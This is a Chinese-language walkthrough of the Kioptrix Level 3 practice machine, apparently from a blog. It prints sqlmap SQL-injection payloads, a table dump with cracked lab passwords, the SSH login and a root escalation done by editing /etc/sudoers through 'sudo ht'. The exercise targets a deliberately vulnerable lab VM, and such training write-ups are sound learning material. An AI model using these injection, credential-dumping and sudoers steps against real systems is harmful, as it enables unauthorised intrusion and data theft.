渗透学习-kioptrix-3
更改域名信息
先编辑/etc/hosts文件将靶机IP地址指向域名kioptrix3.com
信息收集
使用nmap收集信息
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 10.19.243.8
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-31 21:47 EDT
Nmap scan report for kioptrix3.com (10.19.243.8)
Host is up (0.047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.32 seconds
对靶机IP进行扫描,发现开放了22和80端口,我们查看下web服务有什么可用信息
访问后在页面上四处点击看看,最终发现这个按钮能跳转到另一个页面,我们点击继续访问
访问后的页面好像有很多信息,经过查找发现箭头所指这个标签点击后进入了一个排序的网页
进入后点击箭头所示按钮进行排序发现URL中有很常见的字符.php和?id=1,猜想这个网站应该是用php语言编写的,且这个网页可能存在sql注入漏洞,我们进行尝试
果然出现报错信息,那我们不多说直接上sqlmap进行爆破
漏洞利用
┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 --batch
___
__H__
___ ___[(]_____ ___ ___ {1.9.3#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:56:47 /2025-07-31/
[21:56:47] [INFO] resuming back-end DBMS 'mysql'
[21:56:47] [INFO] testing connection to the target URL
[21:56:48] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=049c9d2497e...db95f9023e'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7990=7990) THEN 1 ELSE (SELECT 8737 UNION SELECT 7922) END))
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(2599,6205)>(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(2599=2599,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM (SELECT 7301 UNION SELECT 2377 UNION SELECT 3595 UNION SELECT 3590)a GROUP BY x)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 6883 FROM (SELECT(SLEEP(5)))DXsr)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x5249726a4e4b56464844684966704153554679627278474356584a454b667164556c794544697073,0x7162716b71),NULL,NULL,NULL,NULL-- -
---
[21:56:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 4.1
[21:56:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[21:56:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
[*] ending @ 21:56:48 /2025-07-31/
根据sqlmap给的信息可知:
参数 id(GET 请求)存在以下 4 种可被利用的注入类型:
Boolean-based blind(布尔盲注)
Error-based(报错注入)
Time-based blind(时间盲注)
UNION query(联合查询注入)
目标环境信息:
数据库类型:MySQL(版本 ≥ 4.1)
操作系统:Linux Ubuntu 8.04(老旧版本,可能存在未修复漏洞)
Web 技术栈:PHP 5.2.4(已停止维护,含已知漏洞)Apache 2.2.8
会话管理:服务器使用 PHPSESSID Cookie(扫描时已自动接受)
存在注入,进行爆破!
获取数据库
┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -dbs
___
__H__
___ ___["]_____ ___ ___ {1.9.3#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:00:00 /2025-07-31/
[22:00:00] [INFO] resuming back-end DBMS 'mysql'
[22:00:00] [INFO] testing connection to the target URL
[22:00:00] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=fbac6fcbd66...31eed2e58d'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7990=7990) THEN 1 ELSE (SELECT 8737 UNION SELECT 7922) END))
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(2599,6205)>(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(2599=2599,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM (SELECT 7301 UNION SELECT 2377 UNION SELECT 3595 UNION SELECT 3590)a GROUP BY x)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 6883 FROM (SELECT(SLEEP(5)))DXsr)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x5249726a4e4b56464844684966704153554679627278474356584a454b667164556c794544697073,0x7162716b71),NULL,NULL,NULL,NULL-- -
---
[22:00:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, PHP, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[22:00:02] [INFO] fetching database names
[22:00:02] [INFO] resumed: 'information_schema'
[22:00:02] [INFO] resumed: 'gallery'
[22:00:02] [INFO] resumed: 'mysql'
available databases [3]:
[*] gallery
[*] information_schema
[*] mysql
[22:00:02] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:00:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
[*] ending @ 22:00:02 /2025-07-31/
获取gallery数据库的表名
┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -tables
___
__H__
___ ___[.]_____ ___ ___ {1.9.3#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:00:50 /2025-07-31/
[22:00:50] [INFO] resuming back-end DBMS 'mysql'
[22:00:50] [INFO] testing connection to the target URL
[22:00:50] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=eca7c3bb0f0...13e04f5ae7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7990=7990) THEN 1 ELSE (SELECT 8737 UNION SELECT 7922) END))
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(2599,6205)>(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(2599=2599,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM (SELECT 7301 UNION SELECT 2377 UNION SELECT 3595 UNION SELECT 3590)a GROUP BY x)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 6883 FROM (SELECT(SLEEP(5)))DXsr)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x5249726a4e4b56464844684966704153554679627278474356584a454b667164556c794544697073,0x7162716b71),NULL,NULL,NULL,NULL-- -
---
[22:00:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 4.1
[22:00:52] [INFO] fetching tables for database: 'gallery'
[22:00:52] [INFO] retrieved: 'dev_accounts'
[22:00:52] [INFO] retrieved: 'gallarific_comments'
[22:00:52] [INFO] retrieved: 'gallarific_galleries'
[22:00:52] [INFO] retrieved: 'gallarific_photos'
[22:00:52] [INFO] retrieved: 'gallarific_settings'
[22:00:52] [INFO] retrieved: 'gallarific_stats'
[22:00:52] [INFO] retrieved: 'gallarific_users'
Database: gallery
[7 tables]
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
[22:00:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:00:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
[*] ending @ 22:00:52 /2025-07-31/
获取dev_accounts表格的字段信息
┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -T dev_accounts --column
___
__H__
___ ___[,]_____ ___ ___ {1.9.3#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:02:11 /2025-07-31/
[22:02:11] [INFO] resuming back-end DBMS 'mysql'
[22:02:11] [INFO] testing connection to the target URL
[22:02:12] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5cb71deb5f8...d5848c1863'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7990=7990) THEN 1 ELSE (SELECT 8737 UNION SELECT 7922) END))
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(2599,6205)>(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(2599=2599,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM (SELECT 7301 UNION SELECT 2377 UNION SELECT 3595 UNION SELECT 3590)a GROUP BY x)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 6883 FROM (SELECT(SLEEP(5)))DXsr)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x5249726a4e4b56464844684966704153554679627278474356584a454b667164556c794544697073,0x7162716b71),NULL,NULL,NULL,NULL-- -
---
[22:02:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 4.1
[22:02:13] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[22:02:13] [INFO] retrieved: 'id','int(10)'
[22:02:13] [INFO] retrieved: 'username','varchar(50)'
[22:02:13] [INFO] retrieved: 'password','varchar(50)'
Database: gallery
Table: dev_accounts
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(10) |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+
[22:02:13] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:02:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
[*] ending @ 22:02:13 /2025-07-31/
获取用户名和密码
(提示全部选yes就行)
┌──(root㉿kali)-[~]
└─# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=1 -D gallery -T dev_accounts --dump
___
__H__
___ ___[(]_____ ___ ___ {1.9.3#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:04:47 /2025-07-31/
[22:04:47] [INFO] resuming back-end DBMS 'mysql'
[22:04:47] [INFO] testing connection to the target URL
[22:04:47] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=f4fa4c99f41...f196129430'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7990=7990) THEN 1 ELSE (SELECT 8737 UNION SELECT 7922) END))
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(2599,6205)>(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(2599=2599,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM (SELECT 7301 UNION SELECT 2377 UNION SELECT 3595 UNION SELECT 3590)a GROUP BY x)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 6883 FROM (SELECT(SLEEP(5)))DXsr)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x5249726a4e4b56464844684966704153554679627278474356584a454b667164556c794544697073,0x7162716b71),NULL,NULL,NULL,NULL-- -
---
[22:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[22:04:49] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[22:04:49] [INFO] resumed: 'id','int(10)'
[22:04:49] [INFO] resumed: 'username','varchar(50)'
[22:04:49] [INFO] resumed: 'password','varchar(50)'
[22:04:49] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[22:04:49] [INFO] resumed: '1','0d3eccfb887aabd50f243b3f155c0f85','dreg'
[22:04:49] [INFO] resumed: '2','5badcaf789d3d1d09794d8f021f40f0e','loneferret'
[22:04:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] Y
[22:04:50] [INFO] writing hashes to a temporary file '/tmp/sqlmapj3q6uhvj15709/sqlmaphashes-y0ylstji.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[22:04:54] [INFO] using hash method 'md5_generic_passwd'
[22:04:54] [INFO] resuming password 'Mast3r' for hash '0d3eccfb887aabd50f243b3f155c0f85' for user 'dreg'
[22:04:54] [INFO] resuming password 'starwars' for hash '5badcaf789d3d1d09794d8f021f40f0e' for user 'loneferret'
Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password | username |
+----+---------------------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+
[22:04:54] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[22:04:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[22:04:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
[*] ending @ 22:04:54 /2025-07-31/
我们得到了用户dreg和loneferret的密码,下一步可以尝试ssh登陆了
ssh登陆及提权
ssh登陆
┌──(root㉿kali)-[~]
└─# ssh loneferret@kioptrix3.com
Unable to negotiate with 10.19.243.8 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
这个错误表明SSH客户端(攻击者Kali )无法与目标服务器(kioptrix3.com)协商安全的加密连接,原因是密钥类型不兼容,服务器只支持 ssh-rsa 和 ssh-dss 这两种密钥类型,但 SSH 客户端没有启用这两种密钥类型;根据报错提示,我们使用参数-oHostKeyAlgorithms=+ssh-rsa再进行登陆
参数结构解释:
-o表示后面跟随的是 SSH 的配置选项(等价于在 ~/.ssh/config 文件中设置的参数)HostKeyAlgorithms用于定义客户端愿意接受的服务器主机密钥类型
=+ssh-rsa + 表示在默认算法列表基础上追加 ssh-rsa 算法,如果省略 +(如HostKeyAlgorithms=ssh-rsa),则会 完全覆盖默认列表,仅使用 ssh-rsa
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-rsa loneferret@kioptrix3.com
The authenticity of host 'Kioptrix3 (10.19.243.8)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:7: [hashed name]
~/.ssh/known_hosts:27: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'Kioptrix3' (RSA) to the list of known hosts.
loneferret@Kioptrix3's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$
ssh登陆成功
提权
loneferret@Kioptrix3:~$ ls -la
total 64
drwxr-xr-x 3 loneferret loneferret 4096 2011-04-17 08:59 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw-r--r-- 1 loneferret users 13 2011-04-18 11:44 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 2011-04-11 17:00 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2011-04-11 17:00 .bashrc
-rwxrwxr-x 1 root root 26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root root 224 2011-04-16 08:51 CompanyPolicy.README
-rw------- 1 root root 15 2011-04-15 21:21 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 2011-04-11 17:00 .profile
drwx------ 2 loneferret loneferret 4096 2011-04-14 11:05 .ssh
-rw-r--r-- 1 loneferret loneferret 0 2011-04-11 18:00 .sudo_as_admin_successful
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
查看当前目录文件,发现属于root用户的CompanyPolicy.README文件中有个sudo ht命令可以用,再根据该文件内容提示要求我们使用新安装的软件来编辑、创建和查看文件,猜测这个新软件是个文本编辑器,接着我们执行sudo ht命令出现报错,显示当前环境变量无法打开xterm终端,我们使用export TERM=xterm导出环境变量(export TERM=xterm 是设置一个环境变量 TERM,将其值更改为 xterm ,TERM 变量用于告诉应用程序使用哪种类型的终端,这里是为了更改之前报错的 xterm-256color 设置,以便能够成功运行命令)
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht
再次输入sudo ht命令,进入后发现确实是个文本编辑器,我们尝试修改一下/etc/sudoers文件
根据编辑器下面的菜单按钮F1-F10提示,我们按F3输入/etc/sudoers,回车进入文件
在该文件中添加loneferret用户可以执行/bin/sh或者是/bin/bash特权命令(ps:一定要记得,号,不然命令会出错),然后按F2保存,F10退出
loneferret@Kioptrix3:~$ sudo /bin/sh
# whoami
root
成功提到root权限!
该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
地址:nextcyber
扫一扫
756
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
